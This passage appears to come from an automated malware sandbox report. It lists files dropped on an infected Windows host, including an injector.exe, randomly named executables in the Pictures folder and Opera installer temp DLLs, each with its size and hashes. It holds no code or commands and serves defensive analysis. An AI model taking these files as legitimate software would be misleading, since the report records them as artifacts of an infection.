
                                                                                                                                                                                                                                                                                                                                            118055f6d2acbd16151b53326ab6cc66

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            136dc7ecb3994e0829c440184370840de91c8bb4

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f26055cb64aea9ab848a1a896a774b12b40ff9d564b0e8daf77cb66ae94af4bb

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            38cd90197d60bf660bd00c282ffc2de8f5a7ad14a717d37e3ffc910a39e3750d668995f3ecbe4c8777d94230fed629b5ff1b5ad5034cb8fb2b25e3379a02b4d6

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\dbghelp.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            26KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            535b281ce75799d1a8c5b2d2ddd7092e

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            c9729244f34be4675db87e974b86ecb76575d9c4

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            76f2d2dc3036b40de6174e8a0644e878f29253683e29d2b167c5b34f89630ca3

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            f465d2c10537ec2c688fa80e1fcdb9eb61e7f164d9125aa70c40477912ff24c18e02d1a66f78db8797f4e961f14ae2ece22489b83aea142ca2564cd9e60d0ab3

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\dbghelp.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            37KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            6c6eb72cf7579930b5dc012b696f992d

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            dfa8a9190776ed481b521fe11e163d209f2ea6bf

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            b903405b495de529c69ffd7fc7ad1f8f62b466fbe03c1a0117583a5369498d44

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            878aed566bab478438645030ccdda30bfe1c283d9142cdc9555e880b9beb9905ae173342b0ef191c18a1f4e7710262ead223f907440200debddc35d399405086

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\opera_package

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            70KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            62a0b6b80ce727f6a0eea35b3a24ce6e

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            006272138bf1caa6eb3cab9216ae3fe862d1da1e

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            908aa81d3ddc1573c40d6b0f5b14602a3314cf28b66f0d7749ff60d066691fb4

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            55ab79dcc92fb3cd36f65d588e35ed74f097b0fadd097c3326d720b44ed125d59d50243db2fe6279ea7140d20ec01f3114350f56c2f7fa4de6a1717cb2c04780

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCBAC.tmp\Install.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            57KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            6143d2d7f506fc08587c3fd74725a1ff

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            3de770a4a1813c3e606befd3ec35ffa529789369

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            422317b2f072946b9fe4bc9d4ee6eeb4e3343b60e6ee2ba70ba5bf44c34a46f4

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            c7877a6b0391eb8d035f4c7556b0c0a017fde770b9a2da5fa2044544716cdd0dd74f0ec434bc46f8f3e47d32ce2589a2573e0764e6d8395f52993a731609c72b

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCBAC.tmp\Install.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            61KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            3fd2aee80ae569339553180562f86f8a

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            f541216b531a906caf85da397907807cc5e09a58

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            97d98bf46eac8bd56a9baacdf047ee41a12c09f5d08ba0dcd80c8a54e297b4c2

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            cf87b0f4398a01d0501ef97bae5f7288c1ed86ff402c5636ea1d7a32b200886c936b4628e97762f19111a2413c059c0e2cc93d5bb0fa3dff8290053a902dbe47

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCD81.tmp\Install.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            53KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            25c544d237f8a50e780fdf57c44f12a9

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            68090828ef10099e8a07d12e7bfe145ea65bef0d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            01521be5963016d5ca024773caa90ba4949c4a9653b5acc3331eaa4925ed5d23

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            24ddea424cdf59bb9009e55b6c18faedf41b7035a4e6446e2e09e5b54c8df120ecb3c86e1a2f36db2358ae3b55d35280c85edef325d0aab1a4c3e7ccb55351e5

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCD81.tmp\Install.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            61KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            465970c88669b1f5d1d6b9aff636e11b

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            c383d2dbd0c47a6269805f406a4356a90973dcc1

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            9775ecf0edf187d80c1ff975a6f0b8201a868f2bfa740c3ff532d0ec35de6440

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            8d74c7a2c7f7e3f83cc4f9012528dda8341773a12f83af8df16f6a7a3b55285c91cf93a3f225943cfa6722d5f8cd61d602ae23ac61e56954957ea454ba60ac78

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402042051128711648.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            68KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            646aec3131db16e085c2f89207be3db2

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            17a2aca6c777ecef87c93c70ce0e33300244519d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            7199b8f5a3eeda359597504b9fe87520d5ea5bd657caf96b56e3a57b8cdefa48

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            31f25e8b3eaa833f797380ca5bd2f960faf3ea5aedc954de430d47c9d3151f0f0be1dfd6b76ffa92af1dabcf7271eeb0e2f08b3c143635726c3ec68fa8bc2ead

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Opera_installer_240204205112920416.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            81KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            6b820c270eff55285cc3022436410739

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            420fa003a248523f391fd2b2724a75be5befa5f7

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            90cc468cfe94afdcd3181f8fc75df416129a546edf5f3d54a500122096986618

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            1394f52d41f62e06a1fd77fb3d998d539442edf5dbcbe6b73ef84a5c06b46e9b5ad0f2d94c0d529d37f3421b82bbd0a593aedc7fcb81df2605b699461b87f9d7

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402042051130131524.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            8ff702e6d9a7680b3b7e66abf8b9b671

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            4e0278783fdecf8a83d6f4e7b2c551e3c8ed92fc

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            9c27d9f5efc640e2a1a9b7d4e20ed33ae11d518ed2f0b428d15f09a5ca2b09cf

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            1babef9512cd0210e52a5eabc85d059405b842ab0a2d4cca71639fba226390a735f0c982057c6fdf80dd391312fc7ed7473b02f27abd7a7185c6a40de974df76

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402042051130131524.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            13KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            dc2fd6ca20cdc344c6bb6f5cd9d12d4b

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            185565976a1db5c47909d14b78d75246b08f509b

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f26aa442a574d1c281c189b7f139b5174012049ba28d62dfeb95514737d8349e

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            b8f4807631cc89c4e179e9ca03ecf27ca2317e3782c337339e5c1b0b48de5fa131beb3e4446f3450b28665f7e88bf57415e3d9f888e1ceb232424727a2280b03

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402042051131063772.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            47KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            80ad774c05d7f1581d02afc5cba72b08

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            9539eb675c556cb1361dff20d9bb2ffc1d77a75d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            995539169f811fe737410469a6e22cc5cc8bfc45cc99ee8f473b444921d90497

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            a3cbfdf90a5adb437e91492038e8ff00b82ea0416ae8ed706e0c8e88c7b31575dce9b43b87482038b9efaef80aedc327b3c272c053ca57f0ebcb607f6810d3e1

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2402042051131534556.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            9KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            96a28e799db4db935c0d6de24169f170

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            2a496ee3a856326ccd22b458a38f0db866767533

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            abfbaeb5a772f8100212030831dd726d81c55eb4889b83fe1b971d99f711ac14

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            30a591697c1b8bda95cfa690fd3eae24df40e0d96d0196a86cbaa4f5328f5d82c3b163e4c258bc9c264b24dd363fdb2f20fd80c32c8884ec4d5c5af8ca1f3fa5

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\ugeOWMZ.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            a1828cd756c4e05fa3a2d80efa236267

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            2f9e2ce589121c17444cc0c3462bc7fc5f173574

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            208302f6382cb473dea706a0488636e886c2ba54112a5d61889ac36b5bde32b3

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            f760b807a6a96dd120424863c2e579efc6de46bb995ccb6268d26cea7072c0be4a9a8710ccdc0472e2fdec8bf74b27718fdef6cd859c6a49e7de5d105c6adf2d

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqd12bsx.5x5.ps1

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            60B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            15KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            e58437372bc8e70a61de9eb2dcc6daf0

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            83856454e5667a1f0e3e947329163b4629fb6a1f

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            d807f616b0e97a53166587daa7c4b23898037f8a597a1c8eae9fb4bc92010b31

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            8d0aefb59e69de9071a8e59aeaf86ae62da915283700378b09879f49258a22772a19912ecc7ed828e759e0a0ebbec0a26a5050350ec518184d0557ccfc529707

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            19KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            7433363a638120bfba69b934d84ef314

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            f5f3fdfd03f7f216603eeac38b55e6b7d14a5922

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            a2081f201aabb3e0549b81544dffd426cff041d037d0633384b9445e9ce50908

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            c86ecb00e84a2b647912681445645c3a9536bd0b52baa560dfb5db6e4b5d3aee576e0ff2b90f8df942a4df63af607f61bc8b49b304da2541cd42e3c193e67ef1

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-IQI4O.tmp\cYfr9xPdB4DJRAqHIFbOJ8kb.tmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            469bcca529dfcd04f0dab1d543bb66b2

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            386a8e0763990dc22363baf49d16529d79e54754

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            d8c256842ae4b6f639e6eb1f4cc982a742600d559ec385b60444c0a5a4ebca4a

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            3645b1b2a7c3e2d920609a1a92f0d2b032abafd424cd98031623ac26ac97e4d9dadc723c4b57278145a4ff46a1068a9fca9b236f147cab9e2c520512419d55d9

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-IQI4O.tmp\cYfr9xPdB4DJRAqHIFbOJ8kb.tmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            5KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            4d66339ef7015cfae37af11ff47c372d

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            67ba7f61e54c2737afb6fc8509734a4bad217b68

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f08e85bc3cffc00f1c5492e990eebf8f521953e93bd57deeed8bdeba0aa3d754

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            ba4a4481a78411d4111f908bbdbcf39ffffad8e7561ff6aa612ecb7d5c41d2d89af8b5cb65d3854e55c45e725bf5d06a5ea3ecfa407d9d79a087cc4b0af22d34

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o1s7lgd.default-release\prefs.js

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            7d9b41c0951c4e8ed9cdde5c253f2d23

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            13a70138a2927ce816ad98b2ae9b847b08eb0900

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            c7a798ae0c6cc270ec6103438bea4ac4b088d50772ff65cad20b337c8b3a9f21

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            d065d79f89b0503dc7726c6827970b3b1594a7e52a5c9c30b32c599b0c4275adce635cd7d9150be76af12a7a9c25cea09f5d79fb2b4220205b4ccc145bd89309

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            40B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            ac95b942d332975b6891d7c0fc5e340c

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            13433fd16fc0f3d17dec28007d82180d8dbdd2da

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            e076a6f52969e065d267a43b24a9ec338d88baeccae91512eeeaaa56e5076676

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            9f183ab4bf06a0dd88558fd772881cac06c928deb3d06c4e989be53d7590c325cceb826d7675503e4a9540f4d8e8464e8a6366ad1cb06b06b48a96a5dfc933cc

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Bxie6CgkZO9xzCGJwmwnW4l0.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            273KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            99e487022d77d879993be965383cae18

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            55fdc1859b83ed7ca46b911d25a0ae627f8bfe98

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            6d2b870ce4fe706deed20c49520f357a7eeba930267a37f6cf45f86544a75b29

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            13b717cfb505fa346d1c724135a36d237630acba0eb3e1e5951a6737f579aaa6d09c1661ec796faedf690139b828214f907c507aab385360a236a91513b04914

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Bxie6CgkZO9xzCGJwmwnW4l0.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            147KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            af5a0fafe8042bc8d31de3c76e7ca4f3

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            f5bc6785ef13b058c58d07da4225beeeab516e37

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            c6d0cd3faefa7663946bd9eff505243360c4b1b9831a7ed9434ad85092499fcc

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            4d145eb662cfca3266fcbd8dff827df29e90923a20e2540f2c82413e155782b232243f96c81282213e3af8790510dd5e8ced401fe7da37cdf52aed0729fcee75

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Bxie6CgkZO9xzCGJwmwnW4l0.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            170KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            025baf7e751a661bd868b6eaca518970

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            543bdf559d4fa89fbd1bd3f140646eb698f4a92e

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            a16d8c95a9ffa6a0ef99cdd4394fbe8ae81a383716663de2549276f90f379d07

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            0ea854060acb2418c18349f9007f15bafd7ecee43d1a564fc9b6a4e699bf4ecad0e245b0be96f54adcec7d9cfb72a903c1b73c828b0e58c844de973a1d8f4054

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\FAFTJzBZJMJBCVAb4igbGRFf.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            21321019f7ae169de807af47e9191718

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            590eaad807fb149ba28ca717c9b4734bfbaeef95

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            46bfc86dccda7744b8d58842e33338a31aee7fb680072516ad9ead9b01a74e88

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            98d981ade97e74f77247fd01a7782df307ef76dda4760d6d3a8a0764a50364fbb435bfc83c24ff1ac78efaaabdba8bf9174c69f11625e2f17d7cd63bc51d953c

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\FAFTJzBZJMJBCVAb4igbGRFf.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            26KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            62867e39ac431ec3faa0af950b2d2b2f

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            b948e3b8cfdab12cc329a0d353b6901fb8515ac1

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f053fd3cae3d07e89853f853c6b1843c8092cbfbc0a457c766db4120b9f3d771

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            d2c009c3c437755419517fb592adc4caf7178c94178e255bbd02498a4da34b3b902be07303b3a74a1085a504937f30b1e7b4b429ad53c6d9ccae00481d54df35

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\FAFTJzBZJMJBCVAb4igbGRFf.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            33KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            e21d5483d6e67b131ee66019607dd0e8

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            8b4fb0ce924650f443b0375da026c5286ff0a259

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            e22d4e093830568ce9c52f90cc8985e226969d04b2fea0fdee149025839187a1

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            c9313d4d0e2d33b141b86e2aef37d0163f5a7184e775a585e0971b91b95d25519fc27d2100780c24975720d0f368e46d987757a88850000f041df45d5e21948f

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\LqO5igAMEClXY0R0rZN62o74.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            5b423612b36cde7f2745455c5dd82577

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            0187c7c80743b44e9e0c193e993294e3b969cc3d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\cYfr9xPdB4DJRAqHIFbOJ8kb.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            76KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            fc800cac6614397a1f9f57cdbdc9e992

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            5883e22d9e7d285e24afabb16b0d698cdcbdec1f

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            a0050260b89ef824de4e875682a8e9208270bb166ec408a9580fdbc4c8c91b7b

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            5cc70055f032d065855aededc34cb499d0d8e60282ec467de8af3d47a5e5e35cca3e95eb95b24f820e9644988e6cb84deb23e2d2f389b23fadafdb192ddc37cf

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\cYfr9xPdB4DJRAqHIFbOJ8kb.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            81KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            dc05cc9be4950d071d6b1645290327e1

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            2e706e992df1efa6b8da0efa2f4daf2b12e16e0e

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            f0ea2a9ead86ffe7f9f160ed77413a246e4f8889e0c476046f55347932164356

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            2bca290304d0602145dd3b092638fcc45896413681074c91edad0ce782cb4927ae0d8ab9bf209094adb4efe91be28e0c46cd3a3a50249d962e1845d7c0731d5c

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\enpqvMM2ICn0pUvImTEz0usm.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            185KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            daa696ea5229c7e26b283826fc336d3d

                                                                                                                                                                                                                                                                                                                                            SHA1

